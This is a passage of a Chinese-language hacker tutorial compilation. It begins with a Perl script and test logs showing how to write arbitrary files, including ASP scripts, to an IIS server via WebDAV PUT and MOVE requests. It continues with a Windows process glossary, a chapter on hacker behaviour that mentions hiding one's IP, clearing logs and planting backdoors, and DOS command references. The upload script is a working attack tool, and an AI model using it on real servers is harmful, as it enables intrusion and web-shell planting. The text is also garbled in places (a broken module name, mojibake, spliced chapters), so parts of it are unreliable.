binmode(FILE); #用2进制打开文件
while (read(FILE,$char,1024)) { #读取文件数据上传
print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4]=~/200|201/){
print "upfile Succeed!!!" ; #成功显示
}
else{
print "upfile faile!!!\n\n";
print @req;#如果失败显示返回错误
}
close $sock;
close FILE;
下面我们测试下:
C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.txt /Scripts/kaka.txt
kaka.txt size is 14 bytes
please wait...
upfile Succeed!!!
C:\Inetpub\Scripts>dir kaka.txt
驱动器 C 中的卷没有标签。
卷的序列号是 3CD1-479E
C:\Inetpub\Scripts 的目录
2004-05-05 00:37 14 kaka.txt
1 个文件 14 字节
0 个目录 3,871,080,448 可用字节
这里我们把kaka.txt成功上传到了web目录Scripts下,以为程序中用了binmode()方式(2进制)打开文件,应该可以上传其他文件,我们先测试下exe文件:
C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 perl.exe /Scripts/perl.exe
perl.exe size is 20535 bytes
please wait...
upfile Succeed!!!
C:\Inetpub\Scripts>dir perl.exe
驱动器 C 中的卷没有标签。
卷的序列号是 3CD1-479E
C:\Inetpub\Scripts 的目录
2004-05-05 00:42 20,535 perl.exe
1 个文件 20,535 字节
0 个目录 3,871,031,296 可用字节
成功,可以上传exe了,是不是可以上传任意文件呢?接着来测试asp文件:
C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.asp /Scripts/kaka.asp
kaka.asp size is 4 bytes
please wait...
upfile faile!!!
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Tue, 04 May 2004 16:45:51 GMT
HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/5.0
Date: Tue, 04 May 2004 16:45:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 44
HTTP/1.1 403 Forbidden
失败!!提示HTTP/1.1 403 Forbidden错误,看来直接用post方式写asp不行了,经过测试只要是iis支持的文件类型都会产生HTTP/1.1 403 Forbidden错误。
那我们怎样才可以上传iis支持的文件类型文件呢?iis除了可以执行put,post,get等动作外,还可以执行COPY, MOVE等命令,呵呵!我们这可以先把本地asp上传到远程主机web目录下的txt等其他文件,在提过copy,move命令来改为asp。
我们还是先用nc提交测试下:
D:\>nc 127.0.0.1 80
MOVE /scripts/kaka.txt HTTP/1.1
Host:127.0.0.1
Destination: http://127.0.0.1/scripts/kaka.asp
HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Sun, 05 Oct 2003 09:30:59 GMT
Location: http://127.0.0.1/scripts/x.asp
Content-Type: text/xml
Content-Length: 0
成功利用MOVE把/scripts/kaka.txt改名/scripts/kaka.asp。这样我们就可以结合put和move来完成通过iis写容易文件了:)。我们还是用perl来完成。
测试写asp成功:
C:\usr\bin>perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
************************************************************
codz by ≯SuperHei && lanker
************************************************************
kaka.asp size is 4 bytes
please wait...
upfile Succeed!!!
Modifyfile Succeed!!!
最终的iiswrite.pl代码如下(由于写本文时,在网吧对于文章中代码是先又本人打“草稿”,又lanker测试并最终完成,THX lanker。):
#!/usr/bin/perl
#The iiswrite Script
use I:Socket;
$ARGC = @ARGV;
print "*" x 60;
print "\ncodz by ≯SuperHei && lanker\n";
print "*" x 60,"\n";
if ($ARGC != 4)
{
print "usage:$0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n";
exit;
}
$host = @ARGV[0];
$port = @ARGV[1];
$path = @ARGV[3];
$file = @ARGV[2];
@path=split("/",$path);
$any = pop(@path);
$path1=join("/",@path);
@s=stat("$file");
$size = $s[7];
print "$file size is $size bytes\n";
my $sock = I:Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
print $sock "PUT $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n";
open(FILE,"$file")|| die "Can't open $file";
binmode(FILE);
while (read(FILE,$char,1024)) {
print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4]=~/200|201/){
print "upfile Succeed!!!\n" ;
}
else{
print "upfile faile!!!\n";
}
close $sock;
close FILE;
my $sock = I:Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
print $sock "MOVE $path1/lanker.txt HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Destination:http://$host:$port$path\n\n\n\n";
@req = <$sock>;
if ($req[0]=~/20\d+|/){
print "Modifyfile Succeed!!!" ;
}
else{
print "upfile faile!!!";
}
close $sock;
第28章
(1)[system Idle Process]
进程文件: [system process] or [system process]
进程名称: Windows内存处理系统进程
描 述: Windows页面内存管理进程,拥有0级优先。
介 绍:该进程作为单线程运行在每个处理器上,并在系统不处理其他线程的时候分派处理器的时间。它的cpu占用率越大表示可供分配的CPU资源越多,数字越小则表示CPU资源紧张。
(2)[alg.exe]
进程文件: alg or alg.exe
进程名称: 应用层网关服务
描 述: 这是一个应用层网关服务用于网络共享。
介 绍:一个网关通信插件的管理器,为 “Internet连接共享服务”和 “Internet连接防火墙服务”提供第三方协议插件的支持。
(3)[csrss.exe]
进程文件: csrss or csrss.exe
进程名称: Client/Server Runtime Server Subsystem
描 述: 客户端服务子系统,用以控制Windows图形相关子系统。
介 绍: 这个是用户模式Win32子系统的一部分。csrss代表客户/服务器运行子系统而且是一个基本的子系统必须一直运行。csrss用于维持Windows的控制,创建或者删除线程和一些16位的虚拟MS-DOS环境。
(4)[ddhelp.exe]
进程文件: ddhelp or ddhelp.exe
进程名称: DirectDraw Helper
描 述: DirectDraw Helper是DirectX这个用于图形服务的一个组成部分。
简 介:Directx 帮助程序
(5)[dllhost.exe]
进程文件: dllhost or dllhost.exe
进程名称: DCOM DLL Host进程
描 述: DCOM DLL Host进程支持基于COM对象支持DLL以运行Windows程序。
介 绍:com代理,系统附加的dll组件越多,则dllhost占用的cpu资源和内存资源就越多,而8月的“冲击波杀手”大概让大家对它比较熟悉吧。
(6)[explorer.exe]
进程文件: explorer or explorer.exe
进程名称: 程序管理
描 述: Windows Program Manager或者Windows Explorer用于控制Windows图形Shell,包括开始菜单、任务栏,桌面和文件管理。
介 绍:这是一个用户的shell,在我们看起来就像任务条,桌面等等。或者说它就是资源管理器,不相信你在运行里执行它看看。它对windows系统的稳定性还是比较重要的,而红码也就是找它的麻烦,在c和d根下创建explorer.exe。
(7)[inetinfo.exe]
进程文件: inetinfo or inetinfo.exe
进程名称: IIS Admin Service Helper
描 述: InetInfo是Microsoft Internet Infomation Services (IIS)的一部分,用于Debug调试除错。
介 绍:IIS服务进程,蓝码正是利用的inetinfo.exe的缓冲区溢出漏洞。
(8)[internat.exe]
进程文件: internat or internat.exe
进程名称: Input Locales
描 述: 这个输入控制图标用于更改类似国家设置、键盘类型和日期格式。internat.exe在启动的时候开始运行。它加载由用户指定的不同的输入点。输入点是从注册表的这个位置HKEY_USERS\.DEFAULT\Keyboard Layout\Preload 加载内容的。internat.exe 加载“EN”图标进入系统的图标区,允许使用者可以很容易的转换不同的输入点。当进程停掉的时候,图标就会消失,但是输入点仍然可以通过控制面板来改变。
介 绍:它主要是用来控制输入法的,当你的任务栏没有“EN”图标,而系统有internat.exe进程,不妨结束掉该进程,在运行里执行internat命令即可。
(9)[kernel32.dll]
进程文件: kernel32 or kernel32.dll
进程名称: Windows壳进程
描 述: Windows壳进程用于管理多线程、内存和资源。
介 绍:更多内容浏览非法操作与Kernel32解读
(10)[lsass.exe]
进程文件: lsass or lsass.exe
进程名称: 本地安全权限服务
描 述: 这个本地安全权限服务控制Windows安全机制。管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序等。
介 绍:这是一个本地的安全授权服务,并且它会为使用winlogon服务的授权用户生成一个进程。这个进程是通过使用授权的包,例如默认的msgina.dll来执行的。如果授权是成功的,lsass就会产生用户的进入令牌,令牌别使用启动初始的shell。其他的由用户初始化的进程会继承这个令牌的。而windows活动目录远程堆栈溢出漏洞,正是利用LDAP 3搜索请求功能对用户提交请求缺少正确缓冲区边界检查,构建超过1000个"AND"的请求,并发送给服务器,导致触发堆栈溢出,使Lsass.exe服务崩溃,系统在30秒内重新启动。
(11)[mdm.exe]
进程文件: mdm or mdm.exe
进程名称: Machine Debug Manager
描 述: Debug除错管理用于调试应用程序和Microsoft Office中的Microsoft Script Editor脚本编辑器。
介 绍:Mdm.exe的主要工作是针对应用软件进行排错(Debug),说到这里,扯点题外话,如果你在系统见到fff开头的0字节文件,它们就是mdm.exe在排错过程中产生一些暂存文件,这些文件在操作系统进行关机时没有自动被清除,所以这些fff开头的怪文件里是一些后缀名为CHK的文件都是没有用的垃圾文件,可匀我馍境换岫韵低巢涣加跋臁6?X系统,只要系统中有Mdm.exe存在,就有可能产生以fff开头的怪文件。可以按下面的方法让系统停止运行Mdm.exe来彻底删除以fff开头的怪文件:首先按“Ctrl+Alt+Del”组合键,在弹出的“关闭程序”窗口中选中“Mdm”,按“结束任务”按钮来停止Mdm.exe在后台的运行,接着把Mdm.exe(在C:\Windows\System目录下)改名为Mdm.bak。运行msconfig程序,在启动页中取消对“Machine Debug Manager”的选择。这样可以不让Mdm.exe自启动,然后点击“确定”按钮,结束msconfig程序,并重新启动电脑。另外,如果你使用IE 5.X以上版本浏览器,建议禁用脚本调用(点击“工具→Internet选项→高级→禁用脚本调用”),这样就可以避免以fff开头的怪文件再次产生。
(12)[mmtask.tsk]
进程文件: mmtask or mmtask.tsk
进程名称: 多媒体支持进程
描 述: 这个Windows多媒体后台程序控制多媒体服务,例如MIDI。
介 绍:这是一个任务调度服务,负责用户事先决定在某一时间运行的任务的运行。
(13)[mprexe.exe]
进程文件: mprexe or mprexe.exe
进程名称: Windows路由进程
描 述: Windows路由进程包括向适当的网络部分发出网络请求。
介 绍:这是Windows的32位网络界面服务进程文件,网络客户端部件启动的核心。印象中“A-311木马(Trojan.A-311.104)”也会在内存中建立mprexe.exe进程,可以通过资源管理结束进程。
(14)[msgsrv32.exe]
进程文件: msgsrv32 or msgsrv32.exe
进程名称: Windows信使服务
描 述: Windows信使服务调用Windows驱动和程序管理在启动。
介 绍:msgsrv32.exe 一个管理信息窗口的应用程序,win9x下如果声卡或者显卡驱动程序配置不正确,会导致死机或者提示msgsrv32.exe 出错。
(15)[mstask.exe]
进程文件: mstask or mstask.exe
进程名称: Windows计划任务
描 述: Windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。
介 绍:计划任务,它通过注册表自启动。因此,通过计划任务程序实现自启动的程序在系统信息中看不到它的文件名,一旦把它从注册表中删除或禁用,那么通过计划任务启动的程序全部不能自动运行。win9X下系统启动就会开启计划任务,可以通过双击计划任务图标-高级-终止计划任务来停止它自启动。另外,攻击者在攻击过程中,也经常用到计划任务,包括上传文件、提升权限、种植后门、清扫脚印等。
(16)[regsvc.exe]
进程文件: regsvc or regsvc.exe
进程名称: 远程注册表服务
描 述: 远程注册表服务用于访问在远程计算机的注册表。
(17)[rpcss.exe]
进程文件: rpcss or rpcss.exe
进程名称: RPC Portmapper
描 述: Windows 的RPC端口映射进程处理RPC调用(远程模块调用)然后把它们映射给指定的服务提供者。
介 绍:98它不是在装载解释器时或引导时启动,如果使用中有问题,可以直接在在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices添加"字符串值",定向到"C:\WINDOWS\SYSTEM\RPCSS"即可。
(18)[services.exe]
进程文件: services or services.exe
进程名称: Windows Service Controller
描 述: 管理Windows服务。
介 绍:大多数的系统核心模式进程是作为系统进程在运行。打开管理工具中的服务,可以看到有很多服务都是在调用%systemroot%\system32\service.exe
(19)[smss.exe]
进程文件: smss or smss.exe
进程名称: Session Manager Subsystem
描 述: 该进程为会话管理子系统用以初始化系统变量,MS-DOS驱动名称类似LPT1以及COM,调用Win32壳子系统和运行在Windows登陆过程。
简 介:这是一个会话管理子系统,负责启动用户会话。这个进程是通过系统进程初始化的并且对许多活动的,包括已经正在运行的Winlogon,Win32(Csrss.exe)线程和设定的系统变量作出反映。在它启动这些进程后,它等待Winlogon或者Csrss结束。如果这些过程时正常的,系统就关掉了。如果发生了什么不可预料的事情,smss.exe就会让系统停止响应(就是挂起)。
(20)[snmp.exe]
进程文件: snmp or snmp.exe
进程名称: Microsoft SNMP Agent
描 述: Windows简单的网络协议代理(SNMP)用于监听和发送请求到适当的网络部分。
简 介:负责接收SNMP请求报文,根据要求发送响应报文并处理与WinsockAPI的接口。
(21)[spool32.exe]
进程文件: spool32 or spool32.exe
进程名称: Printer Spooler
描 述: Windows打印任务控制程序,用以打印机就绪。
(22)[spoolsv.exe]
进程文件: spoolsv or spoolsv.exe
进程名称: Printer Spooler Service
描 述: Windows打印任务控制程序,用以打印机就绪。
介 绍:缓冲(spooler)服务是管理缓冲池中的打印和传真作业。
(23)[stisvc.exe]
进程文件: stisvc or stisvc.exe
进程名称: Still Image Service
描 述: Still Image Service用于控制扫描仪和数码相机连接在Windows。
(24)[svchost.exe]
进程文件: svchost or svchost.exe
进程名称: Service Host Process
描 述: Service Host Process是一个标准的动态连接库主机处理服务.
介 绍:Svchost.exe文件对那些从动态连接库中运行的服务来说是一个普通的主机进程名。Svhost.exe文件定位在系统的%systemroot%\system32文件夹下。在启动的时候,Svchost.exe检查注册表中的位置来构建需要加载的服务列表。这就会使多个Svchost.exe在同一时间运行。每个Svchost.exe的回话期间都包含一组服务,以至于单独的服务必须依靠Svchost.exe怎样和在那里启动。这样就更加容易控制和查找错误。windows 2k一般有2个svchost进程,一个是RPCSS(Remote Procedure Call)服务进程,另外一个则是由很多服务共享的一个svchost.exe。而在windows XP中,则一般有4个以上的svchost.exe服务进程,windows 2003 server中则更多。
(25)[taskmon.exe]
进程文件: taskmon or taskmon.exe
进程名称: Windows Task Optimizer
描 述: windows任务优化器监视你使用某个程序的频率,并且通过加载那些经常使用的程序来整理优化硬盘。
介 绍:任务管理器,它的功能是监视程序的执行情况并随时报告。能够监测所有在任务栏中以窗口方式运行的程序,可打开和结束程序,还可直接调出关闭系统对话框。
(26)[tcpsvcs.exe]
进程文件: tcpsvcs or tcpsvcs.exe
进程名称: TCP/IP Services
描 述: TCP/IP Services Application支持透过TCP/IP连接局域网和Internet。
(27)[winlogon.exe]
进程文件: winlogon or winlogon.exe
进程名称: Windows Logon Process
描 述: Windows NT用户登陆程序。这个进程是管理用户登录和退出的。而且winlogon在用户按下CTRL+ALT+DEL时就激活了,显示安全对话框。
(28)[winmgmt.exe]
进程文件: winmgmt or winmgmt.exe
进程名称: Windows Management Service
描 述: Windows Management Service透过Windows Management Instrumentation data WMI)技术处理来自应用客户端的请求。
简 介:winmgmt是win2000客户端管理的核心组件。当客户端应用程序连接或当管理程序需要他本身的服务时这个进程初始化。WinMgmt.exe(CIM对象管理器)和知识库(Repository)是WMI两个主要构成部分,其中知识库是对象定义的数据库,它是存儲所有可管理静态数据的中心数据库,对象管理器负责处理知识库中对象的收集和操作并从WMI提供程序收集信息。WinMgmt.exe在Windows 2k/NT上作为一个服务运行,而在Windows 95/98上作为一个独立的exe程序运行。Windows 2k系统在某些计算机上出现的WMI错误可以通过安装Windows 2k SP2來修正。
(29)[system]
进程文件: system or system
进程名称: Windows System Process
描 述: Microsoft Windows系统进程。
介 绍:在任务管理器中会看到这项进程,属于正常系统进程。
系统进程就介绍到这里。
在Windows2k/XP中,以下进程是必须加载的:
smss.exe、csrss.exe、winlogon.exe、services.exe、lsass.exe、svchost.exe(可以同时存在多个)、spoolsv.exe、explorer.exe、System Idle Process;
在Windows 9x中,一下进程是必须加载的:
msgsrv32.exe、mprexe.exe、mmtask.tsk、kenrel32.dll。

第二部分:中级篇

第1章
第一节、黑客的种类和行为
以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情,因为邪派黑客所从事的事情违背了《黑客守则》,所以他们真正的名字叫“骇客”(Cracker)而非“黑客”(Hacker),也就是我们平时经常听说的“黑客”(Cacker)和“红客”(Hacker)。
无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是一样的。即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点和目的不一样而已。
很多人曾经问我:“做黑客平时都做什么?是不是非常刺激?”也有人对黑客的理解是“天天做无聊且重复的事情”。实际上这些又是一个错误的认识,黑客平时需要用大量的时间学习,我不知道这个过程有没有终点,只知道“多多益善”。由于学习黑客完全出于个人爱好,所以无所谓“无聊”;重复是不可避免的,因为“熟能生巧”,只有经过不断的联系、实践,才可能自己体会出一些只可意会、不可言传的心得。
在学习之余,黑客应该将自己所掌握的知识应用到实际当中,无论是哪种黑客做出来的事情,根本目的无非是在实际中掌握自己所学习的内容。黑客的行为主要有以下几种:
一、学习技术:
互联网上的新技术一旦出现,黑客就必须立刻学习,并用最短的时间掌握这项技术,这里所说的掌握并不是一般的了解,而是阅读有关的“协议”(rfc)、深入了解此技术的机理,否则一旦停止学习,那么依靠他以前掌握的内容,并不能维持他的“黑客身份”超过一年。
初级黑客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基本内容,然而今天的互联网给读者带来了很多的信息,这就需要初级学习者进行选择:太深的内容可能会给学习带来困难;太“花哨”的内容又对学习黑客没有用处。所以初学者不能贪多,应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。
二、伪装自己:
黑客的一举一动都会被服务器记录下来,所以黑客必须伪装自己使得对方无法辨别其真实身份,这需要有熟练的技巧,用来伪装自己的IP地址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。
伪装是需要非常过硬的基本功才能实现的,这对于初学者来说成的上“大成境界”了,也就是说初学者不可能用短时间学会伪装,所以我并不鼓励初学者利用自己学习的知识对网络进行攻击,否则一旦自己的行迹败露,最终害的害是自己。
如果有朝一日你成为了真正的黑客,我也同样不赞成你对网络进行攻击,毕竟黑客的成长是一种学习,而不是一种犯罪。
三、发现漏洞:
漏洞对黑客来说是最重要的信息,黑客要经常学习别人发现的漏洞,并努力自己寻找未知漏洞,并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验,当然他们最终的目的是通过漏洞进行破坏或着修补上这个漏洞。
黑客对寻找漏洞的执著是常人难以想象的,他们的口号说“打破权威”,从一次又一次的黑客实践中,黑客也用自己的实际行动向世人印证了这一点——世界上没有“不存在漏洞”的程序。在黑客眼中,所谓的“天衣无缝”不过是“没有找到”而已。
四、利用漏洞:
对于正派黑客来说,漏洞要被修补;对于邪派黑客来说,漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”,黑客利用漏洞可以做下面的事情:
1、获得系统信息:有些漏洞可以泄漏系统信息,暴露敏感资料,从而进一步入侵系统;
2、入侵系统:通过漏洞进入系统内部,或取得服务器上的内部资料、或完全掌管服务器;
3、寻找下一个目标:一个胜利意味着下一个目标的出现,黑客应该充分利用自己已经掌管的服务器作为工具,寻找并入侵下一个系统;
4、做一些好事:正派黑客在完成上面的工作后,就会修复漏洞或者通知系统管理员,做出一些维护网络安全的事情;
5、做一些坏事:邪派黑客在完成上面的工作后,会判断服务器是否还有利用价值。如果有利用价值,他们会在服务器上植入木马或者后门,便于下一次来访;而对没有利用价值的服务器他们决不留情,系统崩溃会让他们感到无限的快感!
第二节、黑客应掌握的基本技能
从这一节开始,我们就真正踏上学习黑客的道路了,首先要介绍的是作为一名初级黑客所必须掌握的基本技能,学习这可以通过这一节的阅读了解到黑客并不神秘,而且学习起来很容易上手。为了保证初学者对黑客的兴趣,所以本书采取了循环式进度,也就是说每一章节的内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内容。
一、了解一定量的英文:
学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在这段时间内网络管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的网络安全网站。
二、学会基本软件的使用:
这里所说的基本软件是指两个内容:一个是我们日常使用的各种电脑常用命令,例如ftp、ping、net等;另一方面还要学会有关黑客工具的使用,这主要包括端口扫描器、漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多,功能各不相同,所以本书在后面将会介绍几款流行的软件使用方法,学习者在掌握其基本原理以后,既可以选择适合自己的,也可以在“第二部分”中找到有关软件的开发指南,编写自己的黑客工具。
三、初步了解网络协议和工作原理:
所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理,因为协议涉及的知识多且复杂,所以如果在一开始就进行深入研究,势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议,尤其是浏览网页的时候网络是如何传递信息、客户端浏览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容,此部分内容将会在后面的章节中进行具体介绍。
四、熟悉几种流行的编程语言和脚本:
同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言,另外对于htm超文本语言和php、java等做基本了解,主要学习这些语言中的“变量”和“数组”部分,因为语言之间存在内在联系,所以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习C语言和htm超文本语言。
五、熟悉网络应用程序:
网络应用程序包括各种服务器软件后台程序,例如:wuftp、Apache等服务器后台;还有网上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成服务器,然后安装并运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚网络工作原理,这比依靠理论学习要容易许多,能够达到事半功倍的效果!
第2章
我虽然是个小菜鸟!但是还是要劝告刚刚接触网络的人
1,不要研究QQ,毕竟QQ不是技术,盗了几个号又算什么?程序不是自己编写的,没什么值得骄傲的.
2,不要研究怎么破解网吧,难道不觉得:一般关于破解网吧的帖子都很少人回复的么?
3,研究一些系统知识,比如windows什么版本和什么版本有什么区别……
4,研究组策略,研究注册表,研究CMD,研究ASP,研究PHP,研究JAVA……
5,经常来BBS闲逛,例如X,黑防……
6,不要以为扫到**主机的**端口开放就可以利用什么,微软不是傻的!
7,尽量不要吧时间浪费在暴力破解上,因为机会很渺茫!无路可走时才可以用用。
8,不要认为黑客就是非法入侵,就是盗QQ,盗帐号。
9,祖国需要计算机人才,而不需要盗帐号的高手。
10,不要奢望有什么快速的途径学习技术,欲速则不达!没有丰富的经验是没有办法提高的。
如果说错什么,大家都可以指出来~!
对学习技术的一些建议(按顺序去学):
1,认真看看过去的入侵实例(如IPC入侵,输入法漏洞),这样可以好好研究windows基础。
2,学好注册表,因为注册表是windows的数据库,windows相关的数据都在那。
3,多少学些编程,basic都可以,目的是做好基础,了解了解什么是编程。
4,看看一些溢出工具编写的教程(不是让你去写,而是让你了解溢出的真正原理),明白原理之后自己用虚拟机实践一下溢出。
5,有了编程的经验后,就可以看看sql注入攻击了,并且要学习怎么使用NBSI.
学好了这些,基本上就算入门了,想真正提高,只有努力学好编程,不要认为编程离我们很远……也许你会认为用别人的工具也不错,但是不会编程,就永远发现不了windows的系统漏洞,老是使用公布过的漏洞利用程序,想提高还真难啊.
再给一个建议........做一个虚拟机,独立安装一个2000的系统(版本越老越好),然后尽量完善那个系统,看看自己能不能成功入侵(这是积累经验的办法).
这篇帖子没有知识,只是一个方向.学技术需要时间,心急是万万不可Di
我的电脑里有数千个资料文件,都是网上找的.所以我再再建议...:经常逛逛下载站,找找相关资料,并且下载,还有经常去技术blog,把有用的复制保存下来,多少浏览一遍,感兴趣的就认真看(还要用本子记下有用的资料),不感兴趣的就扫一遍. 这个方法其实比你买学技术还要快. 附:什么是有用的资料(例如:windows2000的日志存放处,VPN开启的必须条件,windows_HOME版本的XP不支持"用户与组"功能和没有IIS......) 最后在加一条,一定要学好E文啊! 第3章 有许多方法: 1、开始——运行——输入:cmd——确定 2、开始——程序——附件——cmd命令提示符 还有一些是新建一个批处理进入的,比如在桌面上新建个以.bat为后缀的文件, 右击以记事本打开——输入:cmd,保存退出,双击运行。 还有许多变通…… 注意一下,像本目录下的“入侵命令详解”内的内容是基于IPC$漏洞的,现在这种古老的漏洞可能已经绝迹了,反正我到 现在没遇到过。所以那篇文章重在了解cmd的一些命令的格式。如果初期看不懂,还会有一些重复的cmd讲解,大家可以看那个。 并且不目录目的在于大家了解,不需要都掌握。 并且初期并不要求大家全掌握,在cmd下如果不知命令格式and 用法,可以在cmd下输入"命令 /?",假如你要查询ping的用法,输入ping /?。 要常用google和百度。不会的东西都可以搜索查 google和百度是最好的老师。 pass:不要在网络上随便拜师。许多都是骗人的……^_^ Enjoy it ! 第4章 DOS 常用命令: dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录 copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘 edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录名 more 分屏显示 type 显示文件内容 rd 删除目录 sys 制作DOS系统盘 ren 改变文件名 xcopy 拷贝目录与文件 chkdsk 检查磁盘 attrib 设置文件属性 fdisk 硬盘分区 date 显示及修改日期 label 设置卷标号 defrag 磁盘碎片整理 msd 系统检测 path 设置搜寻目录 share 文件共享 memmaker内存优化管理 help 帮助 restore 恢复备份文件 set 设置环境变量 time 显示及修改时间 tree 列目录树 debug 随机调试程序 doskey 重新调用DOS命令 prempt 设置提示符 undelete恢复被删的文件 scandisk检测、修理磁盘 不常用DOS命令 diskcomp磁盘比较  append 设置非执行文件路径 expand 还原DOS文件 fasthelp快速显示帮助信息 fc 文件比较 interink启动服务器 setver 设置版本 intersvr启动客户机 subst 路径替换 qbasic Basic集成环境 vsafe 防病毒 unformat恢复已格式化的磁盘 ver 显示DOS版本号 smartdrv设置磁盘加速器 vol 显示磁盘卷标号 lh 将程序装入高端内存 ctty 改变控制设备 emm386 扩展内存管理 常用命令具体介绍: 一、Dir 显示目录文件和子目录列表,呵呵,这个当然是人人要知道的。 可以使用通配符(? 和 *),?表通配一个字符,*表通配任意字符 *.后缀 指定要查看后缀的文件。上面其实也可以为“ .后缀”,例如dir *.exe 等于dir .exe /p 每次显示一个列表屏幕。要查看下一屏,请按键盘上的任意键。 /w 以宽格式显示列表,在每一行上最多显示 5 个文件名或目录名。 /s 列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了 dir *.* -> a.txt 把当前目录文件列表写入a.txt dir *.* /s -> a.txt 把当前目录文件列表写入a.txt,包括子目录下文件。 二、Attrib 显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用,则 attrib 会显示当前目录中所有文件的属性。 +r 设置只读属性。 -r 清除只读属性。 +a 设置存档文件属性。 -a 清除存档文件属性。 +s 设置系统属性。 -s 清除系统属性。 +h 设置隐藏属性。 -h 清除隐藏属性。 三、Cls 清除显示在命令提示符窗口中的所有信息,并返回空窗口,即“清屏” 四、Exit 退出当前命令解释程序并返回到系统。 五、format 格式化 /q 执行快速格式化。删除以前已格式化卷的文件表和根目录,但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。 六、Ipconfig 显示所有当前的 TCP/IP 网络配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。 /all 显示所有适配器的完整 TCP/IP 配置信息。 ipconfig 等价于 winipcfg,后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面,但可以使用“网络连接”查看和更新 IP 地址。要做到这一点,请打开 网络连接,右键单击某一网络连接,单击“状态”,然后单击“支持”选项卡。 该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。 七、md 创建目录或子目录 八、Move 将一个或多个文件从一个目录移动到指定的目录。 九、Nbtstat 显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。Nbtstat 命令行参数区分大小写。 -a remotename 显示远程计算机的 NetBIOS 名称表,其中,RemoteName 是远程计算机的 NetBIOS 计算机名称。 -A IPAddress 显示远程计算机的 NetBIOS 名称表,其名称由远程计算机的 IP 地址指定(以小数点分隔)。 十、Netstat 显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息(对于 IP、ICMP、TCP 和 UDP 协议)以及 IPv6 统计信息(对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议)。使用时如果不带参数,netstat 显示活动的 TCP 连接。 -a 显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。 十一、Ping 通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数,ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。 -t 指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息,请按 CTRL-BREAK。要中断并退出 ping,请按 CTRL-C。 -lSize 